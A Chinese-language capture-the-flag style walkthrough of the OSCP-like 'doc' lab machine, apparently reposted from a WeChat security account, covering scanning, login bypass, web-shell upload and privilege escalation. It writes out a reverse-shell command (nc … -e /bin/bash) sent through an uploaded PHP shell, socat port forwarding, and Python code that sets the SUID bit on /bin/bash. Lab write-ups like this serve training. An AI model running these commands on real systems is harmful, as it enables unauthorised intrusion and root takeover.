OSCP 靶场
靶场介绍
|
doc |
easy |
cms getshell、sql注入、任意文件上传、凭证收集、端口转发、socat使用、python 模块利用提权 |
信息收集
主机发现
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.215
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-13 05:15 EST
Nmap scan report for doc (192.168.31.215)
Host is up (0.00074s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-title: Online Traffic Offense Management System - PHP
MAC Address: 08:00:27:73:E3:AB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms doc (192.168.31.215)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds
目录扫描
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.215 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.215
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.215/index.php (Status: 200) [Size: 14323]
http://192.168.31.215/about.html (Status: 200) [Size: 1491]
http://192.168.31.215/home.php (Status: 500) [Size: 229]
http://192.168.31.215/uploads (Status: 301) [Size: 169] [--> http://192.168.31.215/uploads/]
http://192.168.31.215/pages (Status: 301) [Size: 169] [--> http://192.168.31.215/pages/]
http://192.168.31.215/admin (Status: 301) [Size: 169] [--> http://192.168.31.215/admin/]
http://192.168.31.215/assets (Status: 301) [Size: 169] [--> http://192.168.31.215/assets/]
http://192.168.31.215/plugins (Status: 301) [Size: 169] [--> http://192.168.31.215/plugins/]
http://192.168.31.215/database (Status: 301) [Size: 169] [--> http://192.168.31.215/database/]
http://192.168.31.215/classes (Status: 301) [Size: 169] [--> http://192.168.31.215/classes/]
http://192.168.31.215/config.php (Status: 200) [Size: 0]
http://192.168.31.215/dist (Status: 301) [Size: 169] [--> http://192.168.31.215/dist/]
http://192.168.31.215/404.html (Status: 200) [Size: 198]
http://192.168.31.215/inc (Status: 301) [Size: 169] [--> http://192.168.31.215/inc/]
http://192.168.31.215/build (Status: 301) [Size: 169] [--> http://192.168.31.215/build/]
http://192.168.31.215/libs (Status: 301) [Size: 169] [--> http://192.168.31.215/libs/]
添加域名
权限获取
通过万能密码进入系统后台
头像处存在任意文件上传漏洞,尝试上传phpinfo 文件,成功解析
http://doc.hmv/uploads/drivers/1.php?cmd=nc%20192.168.31.11%208888%20-e%20/bin/bash
通过收集的凭据登录到bella 用户
权限提升
执行doc程序会开启一个web服务
通过strings 查看字符串,可以看到执行了pydoc3.9 -p 7890
查看pydoc3.9 模块,就执行了cli()方法。我们尝试篡改里面的内容,但是发现没有权限。
利用socat 进行端口转发,我们可以看到开启后的服务,展示python的一些模块
nohup socat tcp-listen:5000,fork tcp:127.0.0.1:7890 &
sudo doc
在home/bella 下创建一个py 文件,可以看到会出现在web 服务上。
接下来,我们在刚创建的文件下写入如下代码,然后再web 访问一下,将会执行命令,给bash 加上特殊权限。
import os
os.system("chmod +s /bin/bash");
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】doc
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论